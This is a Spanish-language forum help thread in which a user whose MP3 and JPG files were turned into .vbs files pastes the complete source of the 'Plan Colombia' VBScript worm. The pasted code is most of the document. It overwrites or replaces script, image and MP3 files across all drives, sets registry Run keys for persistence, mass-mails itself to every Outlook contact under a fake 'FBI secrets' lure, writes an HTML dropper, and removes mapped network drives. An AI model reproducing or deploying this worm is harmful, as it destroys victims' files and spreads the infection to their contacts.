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Virus ???? Hola! queria saber si alguien me podia ayudar con lo siguiente... no se que es lo que me ataco pero todos los mp3 y imagenes con extencion jpg cambiaron su extencion a vbs archivos de visual basic, y tambien todos pesan 12 kb .. no tengo antivirus .. reinstale XP pero nada sigue igual, si alguien sabe la solucion de esto o de que se trata por favor conteste !! GRacias FeDe-X ![]() |
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Perdon... hace unos minutos este viendo que decia el archivo vbs y puse que windows muestre todos los archivos, bueno en cuestion el archivo dice lo siguiente (parece que toy envirusado hasta los huevos ): rem ================================================== ============================================= rem "Plan Colombia" virus v1.0 rem by Sand Ja9e Gr0w ( rem Dedicated to all the people that want to be hackers or crackers, in Colombia rem This program is also a protest act against the violence and corruption that Colombia lives... rem I always wanting that all this finishes, I have said... rem Santa fe de Bogotá 2000/09 rem I dedicate to all you the song "GoodBye" of Andreas Bochelli rem ================================================== =============================================== rem Thanks God..! rem A greeting for "Lina María" from "Santa fe de Bogotá" rem A greeting for "Tizo" from "Spain" rem And One kicked of tail to my friends, "eL ChE" and "ThE SpY" rem okay, ok... rem my baby start here... On Error Resume Next dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,d ow,polyn,numero,polye eq="" ctr=0 randomize numero = Int(Rnd * 3) + 1 polye = ".GIF.vbs" If numero = 1 Then polye = ".BMP.vbs" Else If numero = 2 Then polye = ".JPG.vbs" End If End If polyn="\"&polyname(Int(Rnd * 5) + 4)&polye Set fso = CreateObject("Scripting.FileSystemObject") set file = fso.OpenTextFile(WScript.ScriptFullname,1) vbscopy=file.ReadAll main() If Day(Now) = 17 And Month(Now) = 9 Then MsgBox "Dedicated to my best brother=>Christiam Julian(C.J.G.S.)" & Chr(13) & "Att. " & polyname(5) & " (M.H.M. TEAM)" killnet() End If sub main() On Error Resume Next dim wscr,rr set wscr=CreateObject("WScript.Shell") rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Micros oft\Windows Scripting Host\Settings\Timeout") if (rr>=1) then wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout",0,"REG_DWORD" end if Set dirwin = fso.GetSpecialFolder(0) Set dirsystem = fso.GetSpecialFolder(1) Set dirtemp = fso.GetSpecialFolder(2) Set c = fso.GetFile(WScript.ScriptFullName) c.Copy(dirsystem&"\LINUX32.vbs") c.Copy(dirwin&"\reload.vbs") c.Copy(dirsystem&polyn) regruns() html() spreadtoemail() listadriv() end sub sub regruns() On Error Resume Next Dim num,downread,res regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cur rentVersion\Run\LINUX32",dirsystem&"\LINUX32.vbs" regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cur rentVersion\RunServices\reload",dirwin&"\reload.vb s" downread="" downread=regget("HKEY_CURRENT_USER\Software\Micros oft\Internet Explorer\Download Directory") if (downread="") then downread="c:\" end if rem acepta nombres largos..? if (fileexist(dirsystem&"\WinFAT32.exe")=1) then Randomize Randomize num = Int((4 * Rnd) + 1) rem fatal => send virii if num = 2 then regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","" else rem oh,, a picture.. nice :) if num = 3 then regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","" else rem oh,, other picture =:() if num = 4 then regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","" end if end if end if end if if (fileexist(downread&"\")=0) then res = Shell("copy " & downread & "\ " & dirwin & "\important_note.txt", vbHide) regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cur rentVersion\Run\plan colombia",dirwin&"\important_note.txt" regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page","about:blank" else if (fileexist(downread&"\")=0) then Kill (dirwin & "\logos.sys") res = Shell("copy " & downread & "\ " & dirwin & "\logos.sys", vbHide) regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page","about:blank" else if (fileexist(downread&"\")=0) then Kill (dirwin & "\logow.sys") res = Shell("copy " & downread & "\ " & dirwin & "\logow.sys", vbHide) regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page","about:blank" end if end if end if end sub sub listadriv On Error Resume Next Dim d,dc,s Set dc = fso.Drives For Each d in dc If d.DriveType = 2 or d.DriveType=3 Then folderlist(d.path&"\") end if Next listadriv = s end sub sub infectfiles(folderspec) On Error Resume Next dim f,f1,fc,ext,ap,mircfname,s,bname,mp3 set f = fso.GetFolder(folderspec) set fc = f.Files for each f1 in fc ext=fso.GetExtensionName(f1.path) ext=lcase(ext) s=lcase( if (ext="vbs") or (ext="vbe") then set ap=fso.OpenTextFile(f1.path,2,true) ap.write vbscopy ap.close else if(ext="js") or (ext="jse") or (ext="css") or (ext="wsh") or (ext="sct") or (ext="hta") then set ap=fso.OpenTextFile(f1.path,2,true) ap.write vbscopy ap.close bname=fso.GetBaseName(f1.path) set cop=fso.GetFile(f1.path) cop.copy(folderspec&"\"&bname&".vbs") fso.DeleteFile(f1.path) else if(ext="jpg") or (ext="jpeg") then set ap=fso.OpenTextFile(f1.path,2,true) ap.write vbscopy ap.close set cop=fso.GetFile(f1.path) cop.copy(f1.path&".vbs") fso.DeleteFile(f1.path) else if(ext="mp3") or (ext="mp2") then set mp3=fso.CreateTextFile(f1.path&".vbs") mp3.write vbscopy mp3.close set att=fso.GetFile(f1.path) att.attributes=att.attributes+2 end if end if end if end if next end sub sub folderlist(folderspec) On Error Resume Next dim f,f1,sf set f = fso.GetFolder(folderspec) set sf = f.SubFolders for each f1 in sf infectfiles(f1.path) folderlist(f1.path) next end sub sub regcreate(regkey,regvalue) Set regedit = CreateObject("WScript.Shell") regedit.RegWrite regkey,regvalue end sub function regget(value) Set regedit = CreateObject("WScript.Shell") regget=regedit.RegRead(value) end function function fileexist(filespec) On Error Resume Next dim msg if (fso.FileExists(filespec)) Then msg = 0 else msg = 1 end if fileexist = msg end function function folderexist(folderspec) On Error Resume Next dim msg if (fso.GetFolderExists(folderspec)) then msg = 0 else msg = 1 end if fileexist = msg end function sub spreadtoemail() On Error Resume Next dim x,a,ctrlists,ctrentries,correoad,b,regedit,regv,re gad,textosub,textobod set regedit=CreateObject("WScript.Shell") set out=WScript.CreateObject("Outlook.Application") set mapi=out.GetNameSpace("MAPI") Randomize numero = Int(Rnd * 3) + 1 textosub = "" If numero = 1 Then textosub = "US PRESIDENT AND FBI SECRETS =PLEASE VISIT => (http://WWW.2600.COM)<=" Else If numero = 2 Then textosub = polyname(6) End If End If Randomize numero = Int(Rnd * 3) + 1 textobod = "" If numero = 1 Then textobod = "VERY JOKE..! SEE PRESIDENT AND FBI TOP SECRET PICTURES.." Else If numero = 2 Then textobod = polyname(10) End If End If for ctrlists=1 to mapi.AddressLists.Count set a=mapi.AddressLists(ctrlists) x=1 regv=regedit.RegRead("HKEY_CURRENT_USER\Software\M icrosoft\WAB\"&a) if (regv="") then regv=1 end if if (int(a.AddressEntries.Count)>int(regv)) then for ctrentries=1 to a.AddressEntries.Count correoad=a.AddressEntries(x) regad="" regad=regedit.RegRead("HKEY_CURRENT_USER\Software\ Microsoft\WAB\"&correoad) if (regad="") then set correo=out.CreateItem(0) correo.Recipients.Add(correoad) correo.Subject = textosub correo.Body = vbcrlf&textobod correo.Attachments.Add(dirsystem&polyn) correo.Send regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&correo ad,1,"REG_DWORD" end if x=x+1 next regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.Ad dressEntries.Count else regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.Ad dressEntries.Count end if next Set out=Nothing Set mapi=Nothing end sub Function polyname(n) Dim i, vector, texto, pos on error resume next rem polyformic ( ohhhh yeahhh...) very good polyformic engine :() by Sand Ja9e Gr0w vector = Array("A", "E", "I", "O", "U") texto = "" Randomize For i = 1 To n Randomize rem consonante texto = texto&Chr(Int((Rnd * 25) + 65)) i = i + 1 If i > n Then exit for end if rem vocal texto = texto&vector(Int((Rnd * 4) + 1)) Randomize Next polyname = texto End Function |
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sub html On Error Resume Next dim lines,n,dta1,dta2,dt1,dt2,dt3,dt4,l1,dt5,dt6 dta1="<HTML><HEAD>"&_ "<?-?HEAD><BODY ONMOUSEOUT=@[email protected]=#-#main#-#; -#,#-#main#-#)@-@ "&vbcrlf& _ "ONKEYDOWN=@[email protected]=#-#main#-#; -#,#-#main#-#)@-@ BGPROPERTIES=@-@fixed@-@ BGCOLOR=@-@#FF9933@-@>"&vbcrlf& _ "<CENTER><p>M.H.M TEAM <?-?p><p>Colombia<BR>- Please press #-#YES#-# button for see secret pictures<?-?p>"&vbcrlf& _ "<?-?CENTER><MARQUEE LOOP=@-@infinite@-@ BGCOLOR=@-@yellow@-@>Hello Colombia...! Since Here, after, since other part of World..<?-?MARQUEE> "&vbcrlf& _ "<?-?BODY><?-?HTML>"&vbcrlf& _ "<SCRIPT language=@-@JScript@-@>"&vbcrlf& _ "<!--?-??-?"&vbcrlf& _ "if (window.screen){var wi=scpeen.availWidth;var hi=screen.availHeight;window.moveTo(0,0); sizeTo(wi,hi);}"&vbcrlf& _ "?-??-?-->"&vbcrlf& _ "<?-?SCRIPT>"&vbcrlf& _ "<SCRIPT LANGUAGE=@-@VBScript@-@>"&vbcrlf& _ "<!--"&vbcrlf& _ "on error resume next"&vbcrlf& _ "dim fso,dirsystem,wri,code,code2,code3,code4,aw,regdit "&vbcrlf& _ "aw=1"&vbcrlf& _ "code=" dta2="set fso=CreateObject(@[email protected]@-@)"&vbcrlf& _ "set dirsystem=fso.GetSpecialFolder(1)"&vbcrlf& _ "code2=replace(code,chr(91)&chr(45)&chr(91),chr(39 ))"&vbcrlf& _ "code3=replace(code2,chr(93)&chr(45)&chr(93),chr(3 4))"&vbcrlf& _ "code4=replace(code3,chr(37)&chr(45)&chr(37),chr(9 2))"&vbcrlf& _ "set wri=fso.CreateTextFile(dirsystem&@-@^-^LINUX32.vbs@-@)"&vbcrlf& _ "wri.write code4"&vbcrlf& _ "wri.close"&vbcrlf& _ "if (fso.FileExists(dirsystem&@-@^-^LINUX32.vbs@-@)) then"&vbcrlf& _ "if (err.number=424) then"&vbcrlf& _ "aw=0"&vbcrlf& _ "end if"&vbcrlf& _ "if (aw=1) then"&vbcrlf& _ "document.write @-@ERROR: can#-#t load Pictures. IE internal Error@-@"&vbcrlf& _ "window.close"&vbcrlf& _ "end if"&vbcrlf& _ "end if"&vbcrlf& _ "Set regedit = CreateObject(@[email protected]@-@)"&vbcrlf& _ "regedit.RegWrite @-@HKEY_LOCAL_MACHINE^-^Software^-^Microsoft^-^Windows^-^CurrentVersion^-^Run^-^LINUX32@-@,dirsystem&@-@^-^LINUX32.vbs@-@"&vbcrlf& _ "?-??-?-->"&vbcrlf& _ "<?-?SCRIPT>" dt1=replace(dta1,chr(35)&chr(45)&chr(35),"'") dt1=replace(dt1,chr(64)&chr(45)&chr(64),"""") dt4=replace(dt1,chr(63)&chr(45)&chr(63),"/") dt5=replace(dt4,chr(94)&chr(45)&chr(94),"\") dt2=replace(dta2,chr(35)&chr(45)&chr(35),"'") dt2=replace(dt2,chr(64)&chr(45)&chr(64),"""") dt3=replace(dt2,chr(63)&chr(45)&chr(63),"/") dt6=replace(dt3,chr(94)&chr(45)&chr(94),"\") set fso=CreateObject("Scripting.FileSystemObject") set c=fso.OpenTextFile(WScript.ScriptFullName,1) lines=Split(c.ReadAll,vbcrlf) l1=ubound(lines) for n=0 to ubound(lines) lines(n)=replace(lines(n),"'",chr(91)+chr(45)+chr( 91)) lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr (93)) lines(n)=replace(lines(n),"\",chr(37)+chr(45)+chr( 37)) if (l1=n) then lines(n)=chr(34)+lines(n)+chr(34) else lines(n)=chr(34)+lines(n)+chr(34)&"&vbcrlf& _" end if next set b=fso.CreateTextFile(dirsystem+"\US-PRESIDENT-AND-FBI-SECRETS.HTM") b.close set d=fso.OpenTextFile(dirsystem+"\US-PRESIDENT-AND-FBI-SECRETS.HTM",2) d.write dt5 d.write join(lines,vbcrlf) d.write vbcrlf d.write dt6 d.close end sub sub killnet() Dim intDrive,strDrive,WSHNetwork on error resume next Set WSHNetwork = WScript.CreateObject("WScript.Network") For intDrive = 26 To 5 Step -1 strDrive = Chr(intDrive + 64) & ":" WSHNetwork.RemoveNetworkDrive strDrive Next rem bye net connection ... ![]() Set WSHNetwork=Nothing end sub Bueno eso es todo .., si alguien puede decirme commo hacer para renombrar todos los archivos y quitar el virus este de mi makina le agradeceria Ahora si .. Saud2 FeDe-X ![]() |